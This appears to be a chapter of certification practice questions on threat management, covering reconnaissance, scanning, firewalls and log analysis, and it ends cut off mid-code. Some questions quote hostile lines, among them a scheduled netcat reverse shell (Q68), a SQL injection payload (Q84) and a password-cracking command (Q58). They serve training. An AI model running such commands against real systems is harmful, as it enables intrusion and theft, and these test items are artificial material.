Chapter 1
Domain 1: Threat Management

EXAM OBJECTIVES COVERED IN THIS CHAPTER:

  • 1.1 Given a scenario, apply environmental reconnaissance techniques using appropriate tools and processes.

    • Procedures/common tasks
    • Variables
    • Tools
  • 1.2 Given a scenario, analyze the results of a network reconnaissance.

    • Point-in-time data analysis
    • Data correlation and analytics
    • Data output
    • Tools
  • 1.3 Given a network-based threat, implement or recommend the appropriate response and countermeasure.

    • Network segmentation
    • Honeypot
    • Endpoint security
    • Group policies
    • ACLs
    • Hardening
    • Network Access Control (NAC)
  • 1.4 Explain the purpose of practices used to secure a corporate environment.

    • Penetration testing
    • Reverse engineering
    • Training and exercises
    • Risk evaluation
  1. Charles wants to use active discovery techniques as part of his reconnaissance efforts. Which of the following techniques fits his criteria?

    1. Google searching
    2. Using a Shodan search
    3. Using DNS reverse lookup
    4. Querying a PGP key server
  2. During the reconnaissance stage of a penetration test, Cynthia needs to gather information about the target organization’s network infrastructure without causing an IPS to alert the target to her information gathering. Which of the following is her best option?

    1. Perform a DNS brute-force attack.
    2. Use an nmap ping sweep.
    3. Perform a DNS zone transfer.
    4. Use an nmap stealth scan.
  3. Tiffany needs to assess the patch level of a Windows 2012 server and wants to use a freely available tool to check the system for security issues. Which of the following tools will provide the most detail about specific patches installed or missing from her machine?

    1. nmap
    2. Nessus
    3. MBSA
    4. Metasploit
  4. Charleen is preparing to conduct a scheduled reconnaissance effort against a client site. Which of the following is not typically part of the rules of engagement that are agreed to with a client for a reconnaissance effort?

    1. Timing
    2. Scope
    3. Exploitation methods
    4. Authorization
  5. A port scan of a remote system shows that port 3306 is open on a remote database server. What database is the server most likely running?

    1. Oracle
    2. Postgres
    3. MySQL
    4. Microsoft SQL
  6. Maria wants to deploy an anti-malware tool to detect zero-day malware. What type of detection method should she look for in her selected tool?

    1. Signature based
    2. Heuristic based
    3. Trend based
    4. Availability based
  7. During a port scan of her network, Cynthia discovers a workstation that shows the following ports open. What should her next action be?

    Image shows programming code with commands such as host is up (0.00023s latency)., not shown: 65524 filtered ports, et cetera, and table shows columns for PORT, STATE, AND SERVICE.
    1. Determine the reason for the ports being open.
    2. Investigate the potentially compromised workstation.
    3. Run a vulnerability scan to identify vulnerable services.
    4. Reenable the workstation’s local host firewall.
  8. Charles wants to provide additional security for his web application that currently stores passwords in plain text in a database. Which of the following options is his best option to prevent theft of the database from resulting in exposed passwords?

    1. Encrypt the database of plain-text passwords.
    2. Use MD5 and a salt.
    3. Use SHA-1 and a salt.
    4. Use bcrypt.
  9. Cameron needs to set up a Linux iptables-based firewall ruleset to prevent access from hosts A and B, while allowing SMTP traffic from host C. Which set of the following commands will accomplish this?

    Diagram shows destination host IP address: 192.168.2.11 on left, firewall in middle, and host A IP address: 10.1.1.170, host B IP address: 10.2.0.134, and host C IP address: 10.2.0.130 on right.
    1. # iptables -I INPUT 2 -s 10.1.1.170 -j DROP
       # iptables -I INPUT 2 -s 10.2.0.0/24 --dport 25 -j DROP
       # iptables -I INPUT 2 -s 10.2.0.130 --dport 25 -j ALLOW
    2. # iptables -I INPUT 2 -s 10.1.1.170 -j DROP
       # iptables -I INPUT 2 -s 10.2.0.0.134 -j DROP
       # iptables -I INPUT 2 -s 10.2.0.130 --dport 25 -j ALLOW
    3. # iptables -I INPUT 2 -s 10.1.1.170 -j ALLOW
       # iptables -I INPUT 2 -s 10.2.0.0.134 -j ALLOW
       # iptables -I INPUT 2 -s 10.2.0.130 --dport 25 -j DROP
    4. # iptables -I INPUT 2 -s 10.1.1.170 -j DROP
       # iptables -I INPUT 2 -s 10.2.0.0.134 -j DROP
       # iptables -I INPUT 2 -s 10.2.0.130 -j ALLOW
  10. After filling out the scoping document for a penetration test, including details of what tools, techniques, and targets are included in the test, what is the next step that Jessica needs to take to conduct the test?

    1. Port scan the target systems.
    2. Get sign-off on the document.
    3. Begin passive fingerprinting.
    4. Notify local law enforcement.
  11. Brian’s penetration testing efforts have resulted in him successfully gaining access to a target system. Using the diagram shown here, identify what step occurs at point B in the NIST SP800-115 process flow.

    Flow diagram shows gaining access leads to B, which leads to system browsing and install additional tools, and finally leads to gaining access.
    1. Vulnerability scanning
    2. Discovery
    3. Escalating privileges
    4. Pivoting
  12. Chris wants to prevent remote login attacks against the root account on a Linux system. What method will stop attacks like this while allowing normal users to use ssh?

    1. Add an iptables rule blocking root logins.
    2. Add root to the sudoers group.
    3. Change sshd_config to deny root login.
    4. Add a network IPS rule to block root logins.
  13. What term is often used for attackers during a penetration test?

    1. Black team
    2. Blue team
    3. Red team
    4. Green team
  14. Charles uses the following command while investigating a Windows workstation used by his organization’s vice president of finance who only works during normal business hours. Charles believes that the workstation has been used without permission by members of his organization’s cleaning staff after-hours. What does he know if the user ID shown is the only user ID able to log into the system, and he is investigating on August 12, 2017?

    C:\Users\igfish>wmic netlogin get name,lastlogon,badpasswordcount
    BadPasswordCount    LastLogon                     Name
                                                      NT AUTHORITY\SYSTEM
    0                   20170811203748.000000-240     Finance\igfish
    
    1. The account has been compromised.
    2. No logins have occurred.
    3. The last login was during business hours.
    4. Charles cannot make any determinations from this information.
  15. Lauren’s honeynet, shown here, is configured to use a segment of unused network space that has no legitimate servers in it. What type of threats is this design particularly useful for detecting?

    Flow diagram shows internet leads to border router, internal trusted zone leads to firewall or unified security device, and together they lead to honeynet.
    1. Zero-day attacks
    2. SQL injection
    3. Network scans
    4. DDoS attacks
  16. Angela is designing her organization’s data center network and wants to establish a secure zone and a DMZ. If Angela wants to ensure that user accounts and traffic that manage systems in the DMZ are easily auditable and that all access can be logged while helping prevent negative impacts from compromised or infected workstations, which of the following solutions is Angela’s best design option?

    1. Administrative virtual machines run on administrator workstations
    2. A jump host
    3. A bastion host
    4. Use ssh or RDP from administrative workstations
  17. Fred believes that the malware he is tracking uses a fast flux DNS network, which associates many IP addresses with a single fully qualified domain name as well as using multiple download hosts. How many distinct hosts should he review based on the netflow shown here?

    Date flow start               Duration Proto    Src IP Addr:Port->Dst IP Addr:Port  Packets   Bytes   Flows
    2017-07-11        14:39:30.606 0.448    TCP      192.168.2.1:1451->10.2.3.1:443      10        1510    1
    2017-07-11        14:39:30.826 0.448    TCP      10.2.3.1:443->192.168.2.1:1451      7         360     1
    2017-07-11        14:45:32.495 18.492   TCP      10.6.2.4:443->192.168.2.1:1496      5         1107    1
    2017-07-11        14:45:32.255 18.888   TCP      192.168.2.1:1496->10.6.2.4:443      11        1840    1
    2017-07-11        14:46:54.983 0.000    TCP      192.168.2.1:1496->10.6.2.4:443      1         49      1
    2008-12-09        16:45:34.764 0.362    TCP      10.6.2.4:443->192.168.2.1:4292      4         1392    1
    2008-12-09        16:45:37.516 0.676    TCP      192.168.2.1:4292->10.6.2.4:443      4         462     1
    2008-12-09        16:46:38.028 0.000    TCP      192.168.2.1:4292->10.6.2.4:443      2         89      1
    2017-07-11        14:45:23.811 0.454    TCP      192.168.2.1:1515->10.6.2.5:443      4         263     1
    2017-07-11        14:45:28.879 1.638    TCP      192.168.2.1:1505->10.6.2.5:443      18        2932    1
    2017-07-11        14:45:29.087 2.288    TCP      10.6.2.5:443->192.168.2.1:1505      37        48125   1
    2017-07-11        14:45:54.027 0.224    TCP      10.6.2.5:443->192.168.2.1:1515      2         1256    1
    2017-07-11        14:45:58.551 4.328    TCP      192.168.2.1:1525->10.6.2.5:443      10        648     1
    2017-07-11        14:45:58.759 0.920    TCP      10.6.2.5:443->192.168.2.1:1525      12        15792   1
    2017-07-11        14:46:32.227 14.796   TCP      192.168.2.1:1525->10.8.2.5:443      31        1700    1
    2017-07-11        14:46:52.983 0.000    TCP      192.168.2.1:1505->10.8.2.5:443      1         40      1
    
    1. 1
    2. 3
    3. 4
    4. 5
  18. Rick is auditing a Cisco router configuration and notes the following line:

    login block-for 120 attempt 5 with 60
    

    What type of setting has been enabled?

    1. A DDoS prevention setting
    2. A back-off setting
    3. A telnet security setting
    4. An autologin prevention setting
  19. As a U.S. government employee, Michael is required to ensure that the network devices that he procures have a verified chain of custody for every chip and component that goes into them. What is this program known as?

    1. Gray market procurement
    2. Trusted Foundry
    3. White market procurement
    4. Chain of Procurement
  20. During a network reconnaissance exercise, Chris gains access to a PC located in a secure network. If Chris wants to locate database and web servers that the company uses, what command-line tool can he use to gather information about other systems on the local network without installing additional tools or sending additional traffic?

    1. ping
    2. traceroute
    3. nmap
    4. netstat
  21. Alice is conducting a penetration test of a client’s systems. As part of her test, she gathers information from the social media feeds of staff members who work for her client. What phase of the NIST penetration testing process is she currently in?

    1. Social engineering
    2. Discovery
    3. Analysis
    4. Social media profiling
  22. What is the default nmap scan type when nmap is not provided with a scan type flag?

    1. A TCP FIN scan
    2. A TCP connect scan
    3. A TCP SYN scan
    4. A UDP scan
  23. Isaac wants to grab the banner from a remote web server using commonly available tools. Which of the following tools cannot be used to grab the banner from the remote host?

    1. netcat
    2. telnet
    3. wget
    4. ftp
  24. Charles wants to limit what potential attackers can gather during passive or semipassive reconnaissance activities. Which of the following actions will typically reduce his organization’s footprint the most?

    1. Limit information available via the organizational website without authentication.
    2. Use a secure domain registration.
    3. Limit technology references in job postings.
    4. Purge all document metadata before posting.
  25. Cassandra’s nmap scan of an open wireless network (192.168.10/24) shows the following host at IP address 192.168.1.1. Which of the following is most likely to be the type of system at that IP address based on the scan results shown?

    Table shows columns for PORT, STATE (open), SERVICE (ssh, domain, http, pptp), and VERSION, and text which reads device type: bridge general purpose.
    1. A virtual machine
    2. A wireless router
    3. A broadband router
    4. A print server
  26. While reviewing Shodan scan data for his organization, John notices the following entry. Which of the following is false?

    Diagram shows boxes with labels for 10001, tcp, and automated-tank-gauge, and text which reads user access verification, username:, et cetera.
    1. The device allows telnet connections.
    2. There is a console port on a nonstandard port.
    3. The device requires sshv1.
    4. The device is an automated tank gauge.
  27. Lauren has local access to a Windows workstation and wants to gather information about the organization that it belongs to. What type of information can she gain if she executes the command nbtstat -c?

    1. MAC addresses and IP addresses of local systems
    2. NetBIOS name-to-IP address mappings
    3. A list of all NetBIOS systems that the host is connected to
    4. NetBIOS MAC-to-IP address mappings
  28. Tracy believes that a historic version of her target’s website may contain data she needs for her reconnaissance. What tool can she use to review snapshots of the website from multiple points in time?

    1. Time Machine
    2. Morlock
    3. Wayback Machine
    4. Her target’s web cache
  29. After Kristen received a copy of an nmap scan run by a penetration tester that her company hired, she knows that the tester used the -O flag. What type of information should she expect to see included in the output other than open ports?

    1. OCMP status
    2. Other ports
    3. Objective port assessment data in verbose mode
    4. Operating system and Common Platform Enumeration (CPE) data
  30. Andrea wants to conduct a passive footprinting exercise against a target company. Which of the following techniques is not suited to a passive footprinting process?

    1. WHOIS lookups
    2. Banner grabbing
    3. BGP looking glass usage
    4. Registrar checks
  31. While gathering reconnaissance data for a penetration test, Charleen uses the MxToolbox MX Lookup tool. What can she determine from the response to her query shown here?

    Window shows table with columns for pref (10, 20), hostname, IP address, and TTL (15 minutes), table shows columns for test (DNS record published) and result (DNS record found), and text which reads your email provider is “MessageLabs” Need bulk email provider data.
    1. The mail servers are blacklisted.
    2. The mail servers have failed an SMTP test.
    3. The mail servers are clustered.
    4. There are two MX hosts listed in DNS.
  32. Alex wants to scan a protected network and has gained access to a system that can communicate to both his scanning system and the internal network, as shown in the image here. What type of nmap scan should Alex conduct to leverage this host if he cannot install nmap on system A?

    Diagram shows device on left connected to protected network with four devices where one of them is labeled A via firewall.
    1. A reflection scan
    2. A proxy scan
    3. A randomized host scan
    4. A ping-through scan
  33. As a member of a blue team, John observed the following behavior during an external penetration test. What should he report to his managers at the conclusion of the test?

    Bar graph shows AMI (AWS) on days from 21st April to 22nd April versus response time in milliseconds from 0 ms to 200 ms versus percent packet loss from 0 percent to 100 percent with plots for response time AMI (AWS) and percent packet loss AMI (AWS).
    1. A significant increase in latency
    2. A significant increase in packet loss
    3. Latency and packet loss both increased.
    4. No significant issues were observed.
  34. As part of an organization-wide red team exercise, Frank is able to use a known vulnerability to compromise an Apache web server. Once he has gained access, what should his next step be if he wants to use the system to pivot to protected systems behind the DMZ that the web server resides in?

    1. Vulnerability scanning
    2. Privilege escalation
    3. Patching
    4. Installing additional tools
  35. As part of her malware analysis process, Caitlyn diagrams the high-level functions and processes that the malware uses to accomplish its goals. What is this process known as?

    1. Static analysis
    2. Composition
    3. Dynamic analysis
    4. Decomposition
  36. Alex has been asked to assess the likelihood of reconnaissance activities against her organization (a small, regional business). Her first assignment is to determine the likelihood of port scans against systems in her organization’s DMZ. How should she rate the likelihood of this occurring?

    1. Low
    2. Medium
    3. High
    4. There is not enough information for Alex to provide a rating.

    Use the following scenario for the questions 37 through 39.

    Lucy is the SOC operator for her organization and is responsible for monitoring her organization’s SIEM and other security devices. Her organization has both domestic and international sites, and many of their employees travel frequently.

  37. While Lucy is monitoring the SIEM, she notices that all of the log sources from her organization’s New York branch have stopped reporting for the past 24 hours. What type of detection rules or alerts should she configure to make sure she is aware of this sooner next time?

    1. Heuristic
    2. Behavior
    3. Availability
    4. Anomaly
  38. After her discovery in the first part of this question, Lucy is tasked with configuring alerts that are sent to system administrators. She builds a rule that can be represented in pseudocode as follows:

    Send a SMS alert every 30 seconds when systems do not send logs for more than 1 minute.

    The average administrator at Lucy’s organization is responsible for 150 to 300 machines.

    What danger does Lucy’s alert create?

    1. A DDoS that causes administrators to not be able to access systems
    2. A network outage
    3. Administrators may ignore or filter the alerts.
    4. A memory spike
  39. Lucy configures an alert that detects when users who do not typically travel log in from other countries. What type of analysis is this?

    1. Trend
    2. Availability
    3. Heuristic
    4. Behavior

  40. During his analysis of a malware sample, John reviews the malware files and binaries without running them. What type of analysis is this?

    1. Automated analysis
    2. Dynamic analysis
    3. Static analysis
    4. Heuristic analysis
  41. The company that Lauren works for is making significant investments in infrastructure-as-a-service hosting to replace its traditional data center. Members of her organization’s management have expressed concerns about data remanence when Lauren’s team moves from one virtual host to another in their cloud service provider’s environment. What should she instruct her team to do to avoid this concern?

    1. Zero-wipe drives before moving systems.
    2. Use full-disk encryption.
    3. Use data masking.
    4. Span multiple virtual disks to fragment data.
  42. Lucca wants to prevent workstations on his network from attacking each other. If Lucca’s corporate network looks like the network shown here, what technology should he select to prevent laptop A from being able to attack workstation B?

    Flow diagram shows computers labeled A and B connected to device, which leads to firewall, border router, and Internet.
    1. An IPS
    2. An IDS
    3. A HIPS
    4. A HIDS
  43. Geoff wants to stop all traffic from reaching or leaving a Linux system with an iptables firewall. Which of the following commands is not one of the three iptables commands needed to perform this action?

    1. # iptables --policy INPUT DROP
    2. # iptables --policy SERVICE DROP
    3. # iptables --policy OUTPUT DROP
    4. # iptables --policy FORWARD DROP
  44. The company that Dan works for has recently migrated to a SaaS provider for its enterprise resource planning (ERP) software. In its traditional on-site ERP environment, Dan conducted regular port scans to help with security validation for the systems. What will Dan most likely have to do in this new environment?

    1. Use a different scanning tool.
    2. Rely on vendor testing and audits.
    3. Engage a third-party tester.
    4. Use a VPN to scan inside the vendor’s security perimeter.
  45. Charles uses Network Miner to review packet captures from his reconnaissance of a target organization. One system displayed the information shown here. What information has Network Miner used to determine that the PC is a Hewlett-Packard device?

    Window shows option for 192.168.137.85 [Leonardo-PC] (Windows) with submenus for OS: Windows, outgoing sessions: 675, et cetera.
    1. The MAC address
    2. The OS flags
    3. The system’s banner
    4. The IP address
  46. Laura’s organization has been receiving a large amount of spam email sent specifically to the email addresses listed in her organization’s domain registrations. Which of the following techniques will help her organization limit this type of spam?

    1. DNS query rate limiting
    2. CAPTCHAs
    3. Using a proxy service
    4. Blacklisting
  47. Eric believes that his organization has a number of vulnerable systems that have been scanned by third parties. If he wants to check publicly available vulnerability information, which of the following methods are best suited to performing this type of passive reconnaissance?

    1. Use the worldwide nmap database.
    2. Search for his domain in Shodan.
    3. Use the OpenVAS central vulnerability data repository.
    4. Check against the CVE database for his domain.
  48. Adam knows that netcat is a useful penetration testing tool. Which of the following is not a way that he can use netcat, if he is using it as his only tool?

    1. File transfer
    2. Port scanner
    3. Encrypted shell
    4. Reverse shell
  49. Which of the following tools can be used to passively gather the information required to generate a network topology map?

    1. Wireshark
    2. nmap
    3. SolarWinds Network Mapper
    4. Nessus
  50. Lauren wants to use an advanced Google query to search for information that is not readily available as part of her reconnaissance efforts. What term is commonly used to describe these searches?

    1. Google whacks
    2. SuperGoogles
    3. Google dorks
    4. Google gizmos
  51. What type of control review will focus on change management as a major element in its assessment scope?

    1. Operational control review
    2. Technical control review
    3. Detective control review
    4. Responsive control review
  52. As part of her reconnaissance process for her organization’s internal security review, Olivia uses Shodan to search for hosts within her target’s IP range. She discovers the following Shodan entry listing for one of her target’s devices. What should she do with this information?

    Diagram shows boxes on left with labels for 23, tcp, and telnet, and text on right which reads Cisco Configuration Professional (Cisco CP) is installed on this device. These default credentials have privilege level of 15.
    1. Activate the incident response process.
    2. Contact the device administrator.
    3. Log in to validate the finding.
    4. Nothing, because this is a false positive.
  53. Kathleen wants to verify on a regular basis that a file has not changed on the system that she is responsible for. Which of the following methods is best suited to this?

    1. Use sha1sum to generate a hash for the file and write a script to check it periodically.
    2. Install and use Tripwire.
    3. Periodically check the MAC information for the file using a script.
    4. Encrypt the file and keep the key secret so the file cannot be modified.
  54. Selah has been tasked with gathering information to increase her penetration testing team’s understanding of their customer’s Internet footprint. She wants to gather details of emails, subdomains, employee names, and other information in an automated way. Which of the following tools is best suited to her needs?

    1. nmap
    2. theHarvester
    3. Shodan
    4. osint-ng
  55. While reviewing the Wireshark packet capture shown here, Ryan notes an extended session using the ESP protocol. When he clicks the packets, he is unable to make sense of the content. What should Ryan look for on the workstation with IP address 10.0.0.1 if he investigates it in person?

    Window shows table with columns for number, time, source, destination, protocol, length, and info, window shows programming code with commands such as total length: 72, time to live: 255, et cetera.
    1. An encrypted RAT
    2. A VPN application
    3. A secure web browser
    4. A base64-encoded packet transfer utility
  56. Ben wants to quickly check a suspect binary file for signs of its purpose or other information that it may contain. What Linux tool can quickly show him potentially useful information contained in the file?

    1. grep
    2. more
    3. less
    4. strings
  57. While investigating a malware infection, Lauren discovers that the hosts file for the system she is reviewing contains multiple entries, as shown here:

    0.0.0.0     symantec.com
    0.0.0.0     mcafee.com
    0.0.0.0     microsoft.com
    0.0.0.0     kapersky.com
    

    Why would the malware make this change?

    1. To redirect 0.0.0.0 to known sites
    2. To prevent antivirus updates
    3. To prevent other attackers from compromising the system
    4. To enable remote access to the system
  58. Alice believes that one of her users may be taking malicious action on the systems she has access to. When she walks past her user’s desktop, she sees the following command on the screen:

    user12@workstation:/home/user12# ./john -wordfile:/home/user12/mylist.txt -format:lm hash.txt
    

    What is the user attempting to do?

    1. They are attempting to hash a file.
    2. They are attempting to crack hashed passwords.
    3. They are attempting to crack encrypted passwords.
    4. They are attempting a pass-the-hash attack.
  59. nmap provides a standardized way to name hardware and software that it detects. What is this called?

    1. CVE
    2. HardwareEnum
    3. CPE
    4. GearScript
  60. Charles wants to detect port scans using syslog so that he can collect and report on the information using his SIEM. If he is using a default CentOS system, what should he do?

    1. Search for use of privileged ports in sequential order.
    2. Search for connections to ports in the /var/syslog directory.
    3. Log all kernel messages to detect scans.
    4. Install additional tools that can detect scans and send the logs to syslog.
  61. Alex wants to list all of the NetBIOS sessions open on a workstation. What command should he issue to do this?

    1. nbtstat -o
    2. nbtstat -r
    3. nbtstat -s
    4. nbtstat -c
  62. Lucas believes that an attacker has successfully compromised his web server. Using the following output of ps, identify the process ID he should focus on.

    root      507  0.0  0.1 258268  3288 ?     Ssl  15:52  0:00 /usr/sbin/rsyslogd -n
    message+  508  0.0  0.2  44176  5160 ?     Ss   15:52  0:00 /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activa
    root      523  0.0  0.3 281092  6312 ?     Ssl  15:52  0:00 /usr/lib/accountsservice/accounts-daemon
    root      524  0.0  0.7 389760 15956 ?     Ssl  15:52  0:00 /usr/sbin/NetworkManager --no-daemon
    root      527  0.0  0.1  28432  2992 ?     Ss   15:52  0:00 /lib/systemd/systemd-logind
    apache    714  0.0  0.1  27416  2748 ?     Ss   15:52  0:00 /www/temp/webmin
    root      617  0.0  0.1  19312  2056 ?     Ss   15:52  0:00 /usr/sbin/irqbalance --pid=/var/run/irqbalance.pid
    root      644  0.0  0.1 245472  2444 ?     Sl   15:52  0:01 /usr/sbin/VBoxService
    root      653  0.0  0.0  12828  1848 tty1  Ss+  15:52  0:00 /sbin/agetty --noclear tty1 linux
    root      661  0.0  0.3 285428  8088 ?     Ssl  15:52  0:00 /usr/lib/policykit-1/polkitd --no-debug
    root      663  0.0  0.3 364752  7600 ?     Ssl  15:52  0:00 /usr/sbin/gdm3
    root      846  0.0  0.5 285816 10884 ?     Ssl  15:53  0:00 /usr/lib/upower/upowerd
    root      867  0.0  0.3 235180  7272 ?     Sl   15:53  0:00 gdm-session-worker [pam/gdm-launch-environment]
    Debian-+  877  0.0  0.2  46892  4816 ?     Ss   15:53  0:00 /lib/systemd/systemd --user
    Debian-+  878  0.0  0.0  62672  1596 ?     S    15:53  0:00 (sd-pam)
    
    1. 508
    2. 617
    3. 846
    4. 714
  63. While reviewing the filesystem of a potentially compromised system, Angela sees the following output when running ls -la. What should her next action be after seeing this?

    Image shows programming codes such as -rwxr-xr-x 1 root root 57 Mar 1 2013 paros, -rwxr-xr-x 1 root root 22256 May 13 2015 parse-edid, et cetera.
    1. Continue to search for other changes.
    2. Run diff against the password file.
    3. Immediately change her password.
    4. Check the passwd binary against a known good version.
  64. Michelle has been experiencing SYN floods and deploys a mitigation technique that allows the server to respond as if SYNs were accepted but then delete the SYN entry in its queue. If the client then responds with a SYN-ACK, the server reconstructs the SYN entry and continues the connection. What technique is Michelle using?

    1. SYN cookies
    2. ACK-ACK
    3. TCP frogging
    4. SYN replay
  65. What two phases of the NIST penetration testing cycle are often repeated during a test?

    1. Planning and discovery
    2. Discovery and attack
    3. Planning and attack
    4. Discovery and reporting
  66. Geoff is responsible for hardening systems on his network and discovers that a number of network appliances have exposed services including telnet, FTP, and web servers. What is his best option to secure these systems?

    1. Enable host firewalls.
    2. Install patches for those services.
    3. Turn off the services for each appliance.
    4. Place a network firewall between the devices and the rest of the network.
  67. Lauren is performing passive intelligence gathering and discovers a directory filled with photos taken by her target organization’s staff. If she wants to review the metadata from the photos, what tool can she use to do so?

    1. Strings
    2. Exiftool
    3. Wireshark
    4. Stegdetect
  68. Lauren’s network firewall denies all inbound traffic but allows all outbound traffic. While investigating a Windows workstation, she encounters a script that runs the following command:

    at \\workstation10 20:30 every:F nc -nv 10.1.2.3 443 -e cmd.exe
    

    What does it do?

    1. It opens a reverse shell for host 10.1.2.3 using netcat every Friday at 8:30.
    2. It uses the AT command to dial a remote host via NetBIOS.
    3. It creates an HTTPS session to 10.1.2.3 every Friday at 8:30.
    4. It creates a VPN connection to 10.1.2.3 every five days at 8:30 GST.
  69. While conducting reconnaissance of his own organization, Chris discovers that multiple certificates are self-signed. What issue should he report to his management?

    1. Self-signed certificates do not provide secure encryption for site visitors.
    2. Self-signed certificates can be revoked only by the original creator.
    3. Self-signed certificates will cause warnings or error messages.
    4. None of the above
  70. Isaac has access to a Windows system that is a member of the local Active Directory domain as part of his white-box penetration test. Which of the following commands might provide information about other systems on the network?

    1. net use
    2. net user
    3. net group
    4. net config
  71. During the reconnaissance stage of a penetration test, Fred calls a number of staff at the target organization. Using a script he prepared, Fred introduces himself as part of the support team for their recently installed software and asks for information about the software and its configuration. What is this technique called?

    1. Pretexting
    2. OSINT
    3. A tag-out
    4. Profiling
  72. Geoff needs to lock down a Windows workstation that has recently been scanned using nmap with the results shown here. He knows that the workstation needs to access websites and that the system is part of a Windows domain. What ports should he allow through the system’s firewall for externally initiated connections?

    Figure: nmap output including "Host is up (0.00023s latency)", "Not shown: 65524 filtered ports", and a table with PORT, STATE, and SERVICE columns.
    1. 80, 135, 139, and 445
    2. 80, 445, and 3389
    3. 135, 139, and 445
    4. No ports should be open.
  73. Lucca wants to identify systems that may have been compromised and are being used for data exfiltration. Which of the following technologies should he put into place to capture data that he can analyze using his SIEM to find this behavior?

    1. A firewall
    2. A netflow collector
    3. A honeypot
    4. A BGP monitor
  74. During a white-box penetration test, Luke finds that he is suddenly unable to connect to the target network. What has likely happened?

    1. Automated shunning
    2. Network link failure
    3. Back-off algorithms
    4. A BGP route change
  75. Adam’s port scan returns results on six TCP ports: 22, 80, 443, 515, 631, and 9100. If Adam needs to guess what type of device this is based on these ports, what is his best guess?

    1. A web server
    2. An FTP server
    3. A printer
    4. A proxy server
  76. Cassandra believes that attackers were able to extract a volume shadow copy of a workstation belonging to her organization’s Windows domain administrator. What information should she not report as being potentially exposed?

    1. All files on the user’s desktop
    2. Password hashes
    3. Domain details
    4. Plain-text Windows account passwords
  77. Lauren is contacted by a concerned administrator who notes that almost all of their Windows 10 Enterprise workstations are reporting the following issue after a patch deployment. What important policy may be missing?

    Window shows table with columns for score, ID (4034658), description, and maximum severity (critical).
    1. Active hours
    2. Required reboots
    3. Automatic updates
    4. Network time synchronization
  78. Jarett needs to protect an application server against resource exhaustion attacks. Which of the following techniques is best suited to surviving a large-scale DDoS attack?

    1. Enable application sharding.
    2. Review each query and implement query optimization.
    3. Implement aggressive aging at the organization’s firewall.
    4. Employ a CDN.
  79. In his role as the SOC operator, Frank regularly scans a variety of servers in his organization. After two months of reporting multiple vulnerabilities on a Windows file server, Frank recently escalated the issue to the server administrator’s manager.

    At the next weekly scan window, Frank noticed that all of the vulnerabilities were no longer active; however, ports 137, 139, and 445 were still showing as open. What most likely happened?

    1. The server administrator blocked the scanner with a firewall.
    2. The server was patched.
    3. The vulnerability plug-ins were updated and no longer report false positives.
    4. The system was offline.
  80. While conducting reconnaissance, Greg discovers what he believes is an SMTP service running on an alternate port. What technique should he use to manually validate his guess?

    1. Send an email via the open port.
    2. Send an SMTP probe.
    3. telnet to the port.
    4. ssh to the port.
  81. Adam is reviewing his organization’s security footprint by conducting reconnaissance activities. After reviewing a list of Google dorks, he runs the following search:

    "mysqli_connect" ext:inc
    

    If it returns data, what should he recommend in his report to management?

    1. Block MySQL connections from remote hosts.
    2. Initiate the organization’s incident response process.
    3. Immediately change MySQL passwords and review configurations.
    4. Change all MySQL connection strings.
  82. Rick’s manager wants to present the most trustworthy certificate possible for a website. What type of certificate should Rick get?

    1. EV
    2. DV
    3. OV
    4. IV
  83. While reviewing web server logs, Danielle notices the following entry. What occurred?

    10.11.210.6 - GET /wordpress/wp-admin/theme-editor.php?file=404.php&theme= total 200
    
    1. A theme was changed.
    2. A file was not found.
    3. There was an attempt to edit the 404 page.
    4. The 404 page was displayed.
  84. While reviewing his Apache logs, Charles discovers the following entry. What has occurred?

    10.1.1.1 - - [27/Jun/2017:11:42:22 -0500] "GET /query.php?searchterm=stuff&%20lid=1%20UNION%20SELECT%200,username,user_id,password,name,%20email,%20FROM%20users HTTP/1.1" 200 9918 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
    
    1. A successful database query
    2. A PHP overflow attack
    3. A SQL injection attack
    4. An unsuccessful database query
  85. What two pieces of information does nmap need to estimate network path distance?

    1. IP address and TTL
    2. TTL and operating system
    3. Operating system and BGP flags
    4. TCP flags and IP address
  86. Charles needs to make sure he has found the correct social media profile for a target of his OSINT process. Which of the following includes the three critical items needed to uniquely identify the majority of Americans?

    1. Height, weight, and eye color
    2. Date of birth, gender, and zip code
    3. Zodiac sign, gender, and zip code
    4. Age, height, and weight
  87. While reviewing logs from users with root privileges on an administrative jump box, Alex discovers the following suspicious command:

    nc -l -p 43501 < example.zip
    

    What happened?

    1. The user set up a reverse shell running as example.zip.
    2. The user set up netcat as a listener to push example.zip.
    3. The user set up a remote shell running as example.zip.
    4. The user set up netcat to receive example.zip.
  88. During an on-site penetration test of a small business, Bob scans outward to a known host to determine the outbound network topology. What information can he gather from the results provided by Zenmap?

    Window shows zenmap with options for target, profile, and command with tabs for Nmap output, ports/ hosts, topology (selected), host details, and scans, and diagram shows concentric circles with markings for localhost, 10.0.2.1 router.asus.com, 96.120.24.121, et cetera.
    1. There are two nodes on the local network.
    2. There is a firewall at IP address 96.120.24.121.
    3. There is an IDS at IP address 96.120.24.121.
    4. He should scan the 10.0.2.0/24 network.
  89. Chris discovers the following entries in /var/log/auth.log. What is most likely occurring?

    Aug  6 14:13:00 demo sshd[5279]: Failed password for root from 10.11.34.11 port 38460 ssh2
    Aug  6 14:13:00 demo sshd[5275]: Failed password for root from 10.11.34.11 port 38452 ssh2
    Aug  6 14:13:00 demo sshd[5284]: Failed password for root from 10.11.34.11 port 38474 ssh2
    Aug  6 14:13:00 demo sshd[5272]: Failed password for root from 10.11.34.11 port 38446 ssh2
    Aug  6 14:13:00 demo sshd[5276]: Failed password for root from 10.11.34.11 port 38454 ssh2
    Aug  6 14:13:00 demo sshd[5273]: Failed password for root from 10.11.34.11 port 38448 ssh2
    Aug  6 14:13:00 demo sshd[5271]: Failed password for root from 10.11.34.11 port 38444 ssh2
    Aug  6 14:13:00 demo sshd[5280]: Failed password for root from 10.11.34.11 port 38463 ssh2
    Aug  6 14:13:01 demo sshd[5302]: Failed password for root from 10.11.34.11 port 38478 ssh2
    Aug  6 14:13:01 demo sshd[5301]: Failed password for root from 10.11.34.11 port 38476 ssh2
    
    1. A user has forgotten their password.
    2. A brute-force attack against the root account
    3. A misconfigured service
    4. A denial-of-service attack against the root account
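The auth.log pattern in question 89 is the classic input for a threshold detector: many failed passwords for one account from one source inside a short window, and, more importantly, a success that follows such a burst. The code below is an added example for this page, not part of the original question set or any product. The log lines are constructed to resemble the ones above (plus one success and one benign failure); the 60-second window, the threshold of five, and the year supplied for the year-less syslog timestamps are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

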